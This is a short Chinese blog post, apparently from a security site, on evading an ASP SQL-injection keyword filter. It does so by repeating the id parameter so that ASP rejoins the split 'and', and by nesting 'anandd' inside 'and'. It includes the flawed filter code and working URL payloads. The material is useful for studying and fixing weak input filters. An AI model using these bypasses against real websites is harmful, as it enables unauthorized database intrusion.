ASP 绕过防注入的新思路:打碎关键字

  • A+
所属分类:lcx

id = request("id")
id = replace(id, "and", "")
…………//过滤其它的危险关键字
id = replace(id, " ", "")
id = replace(id, ",", "") //过滤空格和逗号,这是使用本方法必须的条件
%>

    你还有办法注入吗?以打碎关键字“and”为例,咱们可以这样:

test.asp?id=127%20&id=an&id=d%201=1

    原理很简单,如果你提交 test.asp?id=1&id=2&id=3 时,Asp 接收到的结果是:1, 2, 3,注意中间的空格。

    php 的无效,直接覆盖了,其它的没测试。

    本文所设计的使用条件比较苛刻,需要过滤逗号和空格,但我估计存在这种问题的站点依然不少。

也可以这样写:

    https://lcx.cc/index.asp?id=1
    https://lcx.cc/index.asp?id=(1)anandd(1=1)

文章来源于lcx.cc:ASP 绕过防注入的新思路:打碎关键字

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: